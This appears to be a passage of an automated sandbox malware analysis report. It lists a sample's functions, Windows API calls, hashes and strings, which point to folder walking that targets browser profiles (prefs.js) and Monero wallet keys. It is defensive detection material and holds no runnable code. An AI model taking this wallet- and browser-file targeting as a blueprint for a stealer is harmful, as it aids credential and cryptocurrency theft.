                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                • String ID: %s\%s$%s\*
                                • API String ID: 671575355-2848263008
                                • Opcode ID: bb5721cd9b5607ddf8abd6fe9bd8efbe653ccd28cb5c2f89edc2a5e54f2bac69
                                • Instruction ID: d3e790ecf97e7e4d35555f764a0d862a62232acad1752f3ba58ca3c42ac8a567
                                • Opcode Fuzzy Hash: bb5721cd9b5607ddf8abd6fe9bd8efbe653ccd28cb5c2f89edc2a5e54f2bac69
                                • Instruction Fuzzy Hash: 925111B5950218EBCB24FB74DC89BE973B8AB58700F4046D8A61996150EB749B84CFA1
                                Function 00B83EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 00B83EC3
                                • FindFirstFileA.KERNEL32(?,?), ref: 00B83EDA
                                • StrCmpCA.SHLWAPI(?,00B90FAC), ref: 00B83F08
                                • StrCmpCA.SHLWAPI(?,00B90FB0), ref: 00B83F1E
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00B8406C
                                • FindClose.KERNEL32(000000FF), ref: 00B84081
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\%s
                                • API String ID: 180737720-4073750446
                                • Opcode ID: ad3dcd21eaa8ea1694c0447e3b3b1add25184fabb20e5f00e7de1cdafa765b08
                                • Instruction ID: 0c646c149b115b01b8d2c60514bf683c946b6667ea0d2befd84a8872ef9847b6
                                • Opcode Fuzzy Hash: ad3dcd21eaa8ea1694c0447e3b3b1add25184fabb20e5f00e7de1cdafa765b08
                                • Instruction Fuzzy Hash: 365185B6900218EBCB24FBB4DC85EEA73BCBB44700F4046D8B21992150EB759B85CFA1
                                Function 00B7ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 00B7ED3E
                                • FindFirstFileA.KERNEL32(?,?), ref: 00B7ED55
                                • StrCmpCA.SHLWAPI(?,00B91538), ref: 00B7EDAB
                                • StrCmpCA.SHLWAPI(?,00B9153C), ref: 00B7EDC1
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00B7F2AE
                                • FindClose.KERNEL32(000000FF), ref: 00B7F2C3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\*.*
                                • API String ID: 180737720-1013718255
                                • Opcode ID: c49cb329a46a2b94c28c71194fd6149c5fe2a3201fc13761fd0c838b1783b6bf
                                • Instruction ID: 55adf3739abd4981470ad6cb041e0cb4b707186845d5a416b19e8c535916c884
                                • Opcode Fuzzy Hash: c49cb329a46a2b94c28c71194fd6149c5fe2a3201fc13761fd0c838b1783b6bf
                                • Instruction Fuzzy Hash: E4E1DA719111189AFB54FB64DC51EEE73BCAF54300F4045EAB51A620A2EF346F8ACF62
                                Function 00F31CC3 Relevance: 16.7, Strings: 12, Instructions: 1664COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: ''>$02ag$5y?$9L}$X6y$o8wW$o8wW$tW>-$v'l$vmtu$*V$gj
                                • API String ID: 0-1833511421
                                • Opcode ID: fecbab5a945ec1fc3d3f7031822095912b34a4c7e8b830584d48a2d783d367fb
                                • Instruction ID: 5e3717ab9e4d0066dabf4c57bb46506295bad6c92b7df161718017d1b59662bd
                                • Opcode Fuzzy Hash: fecbab5a945ec1fc3d3f7031822095912b34a4c7e8b830584d48a2d783d367fb
                                • Instruction Fuzzy Hash: BDB204F360C2049FE304AE29EC8567ABBE5EF94720F1A893DE6C4C7744E63598058796
                                Function 00B7F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00B8A740: lstrcpy.KERNEL32(00B90E17,00000000), ref: 00B8A788
                                  • Part of subcall function 00B8A920: lstrcpy.KERNEL32(00000000,?), ref: 00B8A972
                                  • Part of subcall function 00B8A920: lstrcat.KERNEL32(00000000), ref: 00B8A982
                                  • Part of subcall function 00B8A9B0: lstrlen.KERNEL32(?,00938A70,?,\Monero\wallet.keys,00B90E17), ref: 00B8A9C5
                                  • Part of subcall function 00B8A9B0: lstrcpy.KERNEL32(00000000), ref: 00B8AA04
                                  • Part of subcall function 00B8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B8AA12
                                  • Part of subcall function 00B8A8A0: lstrcpy.KERNEL32(?,00B90E17), ref: 00B8A905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00B915B8,00B90D96), ref: 00B7F71E
                                • StrCmpCA.SHLWAPI(?,00B915BC), ref: 00B7F76F
                                • StrCmpCA.SHLWAPI(?,00B915C0), ref: 00B7F785
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00B7FAB1
                                • FindClose.KERNEL32(000000FF), ref: 00B7FAC3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID: prefs.js
                                • API String ID: 3334442632-3783873740
                                • Opcode ID: c75865191487f9b207a14101bd05d6a4149126158c699c57a906a35d2be206d2
                                • Instruction ID: bc675e185d3497c007e040ad65305c07b29556b8a02a63556544e7a795418f06
                                • Opcode Fuzzy Hash: c75865191487f9b207a14101bd05d6a4149126158c699c57a906a35d2be206d2
                                • Instruction Fuzzy Hash: 3CB153719001099BDB24FF64DC96AED73B9AF54300F4085E9E41E961A1EF346B49CFA2
                                Function 00B716D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00B8A740: lstrcpy.KERNEL32(00B90E17,00000000), ref: 00B8A788
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00B9510C,?,?,?,00B951B4,?,?,00000000,?,00000000), ref: 00B71923
                                • StrCmpCA.SHLWAPI(?,00B9525C), ref: 00B71973
                                • StrCmpCA.SHLWAPI(?,00B95304), ref: 00B71989
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00B71D40
                                • DeleteFileA.KERNEL32(00000000), ref: 00B71DCA
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00B71E20
                                • FindClose.KERNEL32(000000FF), ref: 00B71E32
                                  • Part of subcall function 00B8A920: lstrcpy.KERNEL32(00000000,?), ref: 00B8A972
                                  • Part of subcall function 00B8A920: lstrcat.KERNEL32(00000000), ref: 00B8A982
                                  • Part of subcall function 00B8A9B0: lstrlen.KERNEL32(?,00938A70,?,\Monero\wallet.keys,00B90E17), ref: 00B8A9C5
                                  • Part of subcall function 00B8A9B0: lstrcpy.KERNEL32(00000000), ref: 00B8AA04
                                  • Part of subcall function 00B8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B8AA12
                                  • Part of subcall function 00B8A8A0: lstrcpy.KERNEL32(?,00B90E17), ref: 00B8A905
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                • String ID: \*.*
                                • API String ID: 1415058207-1173974218
                                • Opcode ID: 4b8b67a89f7f2bf0ffe23f21b01e22d92d8700d086192c62e68c7165bfff5c98
                                • Instruction ID: f621a1d954af15584cf800175d8176120fe1e9878556973668b038b441cba570
                                • Opcode Fuzzy Hash: 4b8b67a89f7f2bf0ffe23f21b01e22d92d8700d086192c62e68c7165bfff5c98
                                • Instruction Fuzzy Hash: 6D12F5719101189BEB19FB64CC96EED73B8AF54300F4045EAB51A660A1EF346F89CFB1
                                Function 00B7DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00B8A740: lstrcpy.KERNEL32(00B90E17,00000000), ref: 00B8A788
                                  • Part of subcall function 00B8A9B0: lstrlen.KERNEL32(?,00938A70,?,\Monero\wallet.keys,00B90E17), ref: 00B8A9C5
                                  • Part of subcall function 00B8A9B0: lstrcpy.KERNEL32(00000000), ref: 00B8AA04
                                  • Part of subcall function 00B8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B8AA12
                                  • Part of subcall function 00B8A8A0: lstrcpy.KERNEL32(?,00B90E17), ref: 00B8A905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00B90C2E), ref: 00B7DE5E
                                • StrCmpCA.SHLWAPI(?,00B914C8), ref: 00B7DEAE
                                • StrCmpCA.SHLWAPI(?,00B914CC), ref: 00B7DEC4
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00B7E3E0
                                • FindClose.KERNEL32(000000FF), ref: 00B7E3F2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                • String ID: \*.*
                                • API String ID: 2325840235-1173974218
                                • Opcode ID: a88de5c1bcc1108cb60ac49ddbff66d86b6b66cb806ebcd397b2e0fc3cdfb333
                                • Instruction ID: e0907c586bb8d8aa8676464a7b8b58f3e1162f2d4c276fd921f3d98318be1079
                                • Opcode Fuzzy Hash: a88de5c1bcc1108cb60ac49ddbff66d86b6b66cb806ebcd397b2e0fc3cdfb333
                                • Instruction Fuzzy Hash: A7F191718141189AEB15FB64DC95EEE73B8BF54300F8045EAA41A721B1EF346F4ACF62
                                Function 00B7DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00B8A740: lstrcpy.KERNEL32(00B90E17,00000000), ref: 00B8A788
                                  • Part of subcall function 00B8A920: lstrcpy.KERNEL32(00000000,?), ref: 00B8A972
                                  • Part of subcall function 00B8A920: lstrcat.KERNEL32(00000000), ref: 00B8A982
                                  • Part of subcall function 00B8A9B0: lstrlen.KERNEL32(?,00938A70,?,\Monero\wallet.keys,00B90E17), ref: 00B8A9C5
                                  • Part of subcall function 00B8A9B0: lstrcpy.KERNEL32(00000000), ref: 00B8AA04
                                  • Part of subcall function 00B8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B8AA12
                                  • Part of subcall function 00B8A8A0: lstrcpy.KERNEL32(?,00B90E17), ref: 00B8A905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00B914B0,00B90C2A), ref: 00B7DAEB
                                • StrCmpCA.SHLWAPI(?,00B914B4), ref: 00B7DB33
                                • StrCmpCA.SHLWAPI(?,00B914B8), ref: 00B7DB49
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00B7DDCC
                                • FindClose.KERNEL32(000000FF), ref: 00B7DDDE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID:
                                • API String ID: 3334442632-0
                                • Opcode ID: 0e493485faab38b13d33a8c28b24432b906b896073b9473f47545d4e11e8441b
                                • Instruction ID: 7b8dd4cd0d6d2eb9b2840f307ab6542d2bcfa87863adc0e3c9d17bc910306fae
                                • Opcode Fuzzy Hash: 0e493485faab38b13d33a8c28b24432b906b896073b9473f47545d4e11e8441b
                                • Instruction Fuzzy Hash: 149168769001049BDB14FF74DC569ED73BDAF84340F4086E9F91A96191EE38AB09CBA2
                                Function 00F38AB5 Relevance: 11.7, Strings: 8, Instructions: 1665COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: (_V$+/$6Koe$BEAm$P0/s$S4{u$cE?$sj
                                • API String ID: 0-107983975
                                • Opcode ID: 4866d1e7b15de3bf5bb1bfc6344e993f0c0719e4bda48a69ca8c054e3c976351
                                • Instruction ID: 94bbafa858e1f41d6328ea9f7be2abb622813ec7323ed443207311887387ed24
                                • Opcode Fuzzy Hash: 4866d1e7b15de3bf5bb1bfc6344e993f0c0719e4bda48a69ca8c054e3c976351
                                • Instruction Fuzzy Hash: BEB228F360C2049FE308AE2DEC8567ABBE9EF94320F1A453DEAC5C3744E93558158697
                                Function 00B87B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00B8A740: lstrcpy.KERNEL32(00B90E17,00000000), ref: 00B8A788
                                • GetKeyboardLayoutList.USER32(00000000,00000000,00B905AF), ref: 00B87BE1
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00B87BF9
                                • GetKeyboardLayoutList.USER32(?,00000000), ref: 00B87C0D
                                • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00B87C62
                                • LocalFree.KERNEL32(00000000), ref: 00B87D22
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                • String ID: /
                                • API String ID: 3090951853-4001269591
                                • Opcode ID: fcf1f0cc08b5a7922046133124af5d1f43ac5df6a260b6a1c8b9e66329cdfc93
                                • Instruction ID: 97f60adbdffcbcc4c8846486d080b7df3f8c805d82f2fc1f82665afcf7127967
                                • Opcode Fuzzy Hash: fcf1f0cc08b5a7922046133124af5d1f43ac5df6a260b6a1c8b9e66329cdfc93
                                • Instruction Fuzzy Hash: 33415E71940218EBDB24EB94DC99BEDB3B4FF44704F2042D9E009A22A0DB346F85CFA1
                                Function 00F428A5 Relevance: 10.4, Strings: 7, Instructions: 1699COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
